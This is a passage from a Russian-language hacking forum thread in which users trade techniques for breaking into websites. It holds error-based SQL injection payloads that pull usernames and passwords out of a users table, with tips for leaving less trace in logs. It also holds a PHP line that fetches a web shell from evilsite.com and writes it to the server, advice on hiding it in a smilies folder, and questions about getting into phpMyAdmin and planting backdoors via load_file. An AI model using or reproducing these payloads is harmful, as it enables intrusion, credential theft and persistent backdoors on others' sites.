19.05.2012, 16:47
|
|
Познающий
Регистрация: 02.05.2011
Сообщений: 48
Провел на форуме:
9121
Репутация:
1
|
|
DELITE
|
|
|
19.05.2012, 16:51
|
|
Новичок
Регистрация: 12.08.2009
Сообщений: 1
Провел на форуме:
11937
Репутация:
0
|
|
to абвгдешка
Код:
-1' OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3) x GROUP BY MID((SELECT+CONCAT_WS(0x3a,user,pass)+from+users+limit+0,1), FLOOR(RAND(0)*2), 64))
|
|
|
|
19.05.2012, 16:56
|
|
Новичок
Регистрация: 12.08.2009
Сообщений: 1
Провел на форуме:
11937
Репутация:
0
|
|
to bodrich
У Вас не получается, потому как может стоять FreeBSD там нет wget'a там fetch стоит по умолчанию,a лучше делать через file_put_contents("shell.php",file_get_contents("h ttp://evilsite.com/shell.txt"))
Сообщение от None
Пробывал уже, не получается (
Может уже есть там такой файл? И лейте в папку со смайлами! |
|
|
|
20.05.2012, 17:14
|
|
Участник форума
Регистрация: 13.11.2010
Сообщений: 184
Провел на форуме:
59158
Репутация:
2
|
|
Ребята что можно сделать с такой проблемой - Есть данные бд от сайта но подключиться можно только по localhost , как быть с удаленным подключением ?
|
|
|
|
20.05.2012, 17:32
|
|
Новичок
Регистрация: 12.08.2009
Сообщений: 1
Провел на форуме:
11937
Репутация:
0
|
|
Никак!
|
|
|
|
20.05.2012, 20:26
|
|
Участник форума
Регистрация: 30.07.2010
Сообщений: 118
Провел на форуме:
39063
Репутация:
0
|
|
Товарищи!
Тема: phpmyadmin
имеется доступ к /scripts/setup.php
точнее: версия 2.11.2.2
сплоиты не пашут.
Можно ли что-то сотворить чтобы войти в админку?
спасибо.
PS: на кнопки хоть тыкай, хоть нет: config.inc.php пуст,как добавить нового юзера понятия не имею
|
|
|
|
21.05.2012, 01:23
|
|
Постоянный
Регистрация: 16.10.2011
Сообщений: 326
Провел на форуме:
103014
Репутация:
76
|
|
Добрый вечер, парни. Вопрос такого характера. На днях столкнулся с, казалось бы идеальным вариантом заливки через GET-запрос в адресной строке браузера: file_priv == Y, MQ == off, раскрытие путей, все дела.
Быстро просканив директории сайта, на предмет каталогов, куда бы залить бекдор, меня везде ждал облом. Я списал это на отсутствие прав на запись.
Однако, поскольку сайт бы русскоязычный, я предположил, что там возможно присутствие папки Sape, которая всегда 0777. Так, вот имея все вводные данные, описанные выше, я не смог прочитать через load_file исходный код страницы index.php. Вообще никаких. /etc/passwd, мускульные конфиги - да, но только не файлы из каталогов самого сайта.
Я где-то читал, что мускул имеет возможную настройку, на запрет чтения файлов из каталога сайта, что именно и было в моем случае, как я понял. Был бы признателен за ссылки по этому вопросу - как настраивается подобная фича, где почитать?
Ведь это можно считать довольно неплохим рубежом защиты и для своего проекта.
Спасибо за любую помощь(в гугле не забанен, но что-то ничего не нашел, релевантное моему вопросу.)
|
|
|
|
21.05.2012, 02:11
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Га-Ноцри
если смотреть со стороны привилегий то Пользователь mysql находится в группе "others" для серверных файлов, стоит просто чмодить файлы веба, сделать нечитабельными для "others" и все станет на место
chmod 750, допустим
по поводу мускулного запрета (secure_file_priv) , читай тут
|
|
|
|
21.05.2012, 02:26
|
|
Постоянный
Регистрация: 16.10.2011
Сообщений: 326
Провел на форуме:
103014
Репутация:
76
|
|
Сообщение от Konqi
Га-Ноцри
если смотреть со стороны привилегий то Пользователь mysql находится в группе "others" для серверных файлов, стоит просто чмодить файлы веба, сделать нечитабельными для "others" и все станет на место
chmod 750, допустим
по поводу мускулного запрета (secure_file_priv) , читай
тут
Большое спасибо за пояснение. Вопрос исчерпан. Углубился в чтение
|
|
|
|
21.05.2012, 14:48
|
|
Новичок
Регистрация: 17.05.2012
Сообщений: 4
Провел на форуме:
924
Репутация:
0
|
|
Сообщение от cat1vo
to
абвгдешка
Код:
-1' OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3) x GROUP BY MID((SELECT+CONCAT_WS(0x3a,user,pass)+from+users+limit+0,1), FLOOR(RAND(0)*2), 64))
Зачем вот так усложнять запрос?
Лишнее палево в логах.
Код:
1' or 1 group by concat(version(),rand(0)|) having min(0)
Having min(0) не всегда нужен.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
